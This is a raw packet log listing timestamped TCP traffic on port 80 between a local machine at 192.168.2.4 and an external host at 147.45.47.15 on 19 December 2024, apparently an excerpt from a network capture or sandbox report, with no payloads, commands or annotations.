Dec 19, 2024 08:52:38.634673119 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.635387897 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.635401011 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.635412931 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.635459900 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.635492086 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.636127949 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.636142015 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.636167049 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.636193037 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.636889935 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.636903048 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.636914968 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.636929035 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.636939049 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.636971951 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.637650013 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.637664080 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.637676001 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.637712955 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.637733936 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.638390064 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.638403893 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.638416052 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.638446093 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.639153957 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.639168978 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.639180899 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.639194012 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.639203072 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.639216900 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.639884949 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.639925003 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.639945030 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.639956951 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.639997005 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.640690088 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.640718937 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.640734911 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.640871048 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.641438961 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.641454935 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.641468048 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.641483068 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.641493082 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.641526937 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.642187119 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.642201900 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.642214060 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.642252922 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.642267942 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.642296076 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.642929077 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.642947912 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.642960072 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.642993927 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.643994093 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.644007921 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.644020081 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.644036055 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.644043922 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.644054890 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.644467115 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.644479990 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.644493103 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.644526958 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.644539118 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.645210028 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.645224094 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.645236015 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.645248890 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.645262957 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.645293951 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.645967960 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.645982981 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.645994902 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.646024942 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.646739960 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.646768093 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.646780968 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.646795034 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.646806955 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.646836042 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.647515059 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.647531033 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.647545099 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.647572041 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.647588015 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.648272991 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.648289919 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.648303032 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.648332119 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.649013042 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.649032116 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.649048090 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.649059057 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.649240017 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.649503946 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.649517059 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.649561882 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.649979115 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.649991989 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.650033951 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.650378942 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.650624037 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.650872946 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.650908947 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.651077032 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.651828051 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.651887894 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.652024031 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.652069092 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.652728081 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.652919054 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.653256893 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.653287888 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.653554916 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.653650999 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.653767109 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.654525042 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.654582977 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.654639006 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.655359983 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.655817986 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.655893087 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.656183004 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.656196117 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.656236887 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.657051086 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.657073975 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.657119036 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.657881975 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.657924891 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.658170938 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.658740997 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.658931017 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.659045935 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.659593105 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.659856081 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.660490990 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.660558939 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.680785894 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.727041960 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.727111101 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.727432013 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.727483988 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.727705002 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.727782965 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.728601933 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.728980064 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.729089975 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.729135990 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.730125904 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.730185032 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.730381966 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.731256008 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.731277943 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.731306076 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.732265949 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.732316017 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.732475996 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.733412981 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.733505011 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.733567953 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.734457016 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.734611034 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.734671116 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.735579967 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.735675097 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.735817909 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.736637115 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.736695051 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.736821890 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.737713099 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.737817049 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.737828016 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.738846064 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.738915920 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.738938093 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.739875078 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.740067959 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.740113974 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.740972042 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.741014957 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.741143942 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.742157936 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.742196083 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.742373943 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.743240118 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.743279934 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.743360043 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.744345903 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.744389057 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.744431019 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.745367050 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.745439053 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.745476007 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.746407986 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.746452093 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.746582031 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.747509956 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.747559071 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.747663975 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.748648882 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.748688936 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.748754978 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.749946117 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.749991894 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.750118971 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.750864029 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.751051903 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.751106977 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.767118931 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.768466949 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.768486023 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.768527031 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.768954992 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.768966913 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.769747972 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.769752026 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.770258904 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.770272017 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.770344973 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.771272898 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.771287918 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.771538973 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.772361040 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.772375107 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.772408009 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.773271084 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.773283958 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.773334980 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.774439096 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.774544001 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.774557114 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.774591923 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.775271893 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.775285959 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.775300026 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.775341988 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.775362015 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.775616884 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.775629044 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.775676966 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.776108980 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.776392937 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.776407003 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.776448011 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.776669025 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.776998043 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.777137995 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.777282000 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.777293921 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.777337074 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.777370930 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.777801991 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.777813911 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.777827024 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.777877092 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.778367043 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.778718948 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.778768063 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.778769970 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.779243946 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.779256105 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.779283047 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.779306889 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.779354095 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.779767990 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.779860020 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.780009985 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.780354977 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.780369043 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.780415058 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.780817986 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.780879021 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.780946016 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.781397104 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.781409979 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.781449080 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.781888008 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.782051086 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.782098055 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.782495975 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.782502890 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.782550097 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.782947063 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.783072948 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.783185959 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.783395052 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.783672094 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.783744097 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.784053087 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.784451962 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.784454107 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.784457922 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.784497023 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.784512997 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.785284996 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.785659075 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.785670042 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.785681009 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.785717964 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.785733938 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.786370993 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.786478043 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.786489010 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.786515951 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.786535025 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.787286043 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.787297010 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.787339926 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.787451029 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.787466049 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.788319111 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.788331032 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.788372993 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.788378000 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.788480043 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.788703918 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.788716078 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.788758039 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.789529085 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.789539099 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.789633036 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.789961100 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.790183067 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.790327072 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.790365934 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.790600061 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.790607929 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.790849924 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.790865898 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.790916920 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.791347027 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.791405916 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.791661978 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.792032957 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.792045116 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.792084932 CET	49734	80	192.168.2.4	147.45.47.15
